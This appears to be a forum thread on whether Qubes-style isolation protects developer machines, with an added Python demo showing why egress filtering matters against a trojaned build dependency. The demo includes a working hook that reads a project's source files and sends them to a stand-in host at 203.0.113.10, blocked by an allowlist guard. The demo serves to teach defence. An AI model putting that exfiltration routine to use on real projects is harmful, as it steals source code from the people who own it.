
I wonder if making the development machine use something similar to Qubes (https://www.qubes-os.org/) by default works.

Also, if a compromised machine on the internal network destroys your company's security assumptions, then there must not be much defense in depth.



Qubes-like solutions are great at preventing malicious code from accessing your internal websites, but pretty useless from a "code leak" perspective.

If you have downloaded a trojaned "super library" and put it into your build process, it will, by definition, be in the same security domain as your source code.

Unless you audit all file accesses and outgoing internet access, you won't be able to prevent code exfiltration.
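An added example, not code from the thread, illustrating the point above in Python: a hypothetical build plugin runs inside the build process, so it can read every file the build can read, and the only thing that stops it sending the tree out is a control on outgoing connections. The plugin name `trojaned_configure`, the documentation address `203.0.113.10`, the source tree and the `EgressGuard` allowlist are all constructed for the demo; a real deployment would enforce the allowlist at the firewall or network-namespace level rather than by patching `socket` in-process, which is used here only to make the check self-contained.

```python
import socket
import tempfile
from pathlib import Path


def make_source_tree(root: Path) -> None:
    """Constructed stand-in for a proprietary source checkout."""
    (root / "src").mkdir(parents=True)
    (root / "src" / "secret_algo.py").write_text("def f(x):\n    return x * 42\n")
    (root / "src" / "config.py").write_text("API_ENDPOINT = 'internal'\n")


def trojaned_configure(project_root: Path, exfil_host: str, exfil_port: int) -> dict:
    """Hypothetical build hook from a trojaned dependency.

    It is imported and called by the build, so it runs with the build's own
    filesystem view: nothing at the VM boundary separates it from the source.
    """
    collected = {}
    for path in project_root.rglob("*.py"):
        collected[str(path.relative_to(project_root))] = path.read_text()
    payload = repr(collected).encode()
    try:
        with socket.create_connection((exfil_host, exfil_port), timeout=1) as s:
            s.sendall(payload)
        sent = True
    except OSError:
        sent = False
    return {"files_read": sorted(collected), "sent": sent}


class EgressGuard:
    """Records and blocks any TCP connect() to a (host, port) not on the allowlist.

    Assumed control for the demo; in production the same policy belongs on the
    build network (egress firewall, netns without a default route), not in-process.
    """

    def __init__(self, allowed):
        self.allowed = set(allowed)
        self.blocked = []
        self._orig = socket.socket.connect

    def __enter__(self):
        guard, orig = self, self._orig

        def guarded_connect(sock, address):
            host, port = address[0], address[1]
            if (host, port) not in guard.allowed:
                guard.blocked.append((host, port))
                raise PermissionError(f"egress to {host}:{port} not in allowlist")
            return orig(sock, address)

        socket.socket.connect = guarded_connect
        return self

    def __exit__(self, *exc):
        socket.socket.connect = self._orig
        return False


def demo(exfil_host: str = "203.0.113.10", exfil_port: int = 9999) -> dict:
    """Run the hostile build hook under the egress guard and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_source_tree(root)
        guard = EgressGuard(allowed={("build.internal", 443)})
        with guard:
            result = trojaned_configure(root, exfil_host, exfil_port)
    return {"files_read": result["files_read"], "sent": result["sent"], "blocked": guard.blocked}


def allowed_connection_works() -> bool:
    """Sanity check: legitimate build traffic on the allowlist still goes through."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    try:
        with EgressGuard(allowed={("127.0.0.1", port)}) as guard:
            with socket.create_connection(("127.0.0.1", port), timeout=1):
                pass
        return guard.blocked == []
    finally:
        listener.close()


if __name__ == "__main__":
    print(demo())  # files_read lists both source files, sent is False, blocked names the exfil target
    print(allowed_connection_works())
```

The result shows both halves of the argument: `files_read` contains the whole tree (the hook shares the build's security domain, so no file-level sandboxing at the VM boundary helped), and `sent` is `False` only because the outgoing connection was denied and logged. Without the egress control there is nothing in the build to distinguish this read from the compiler's.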


Is code exfiltration really the threat model, though?


Depends on whether you work on a product or in IT. For products in certain industries, yes, it is a concern.



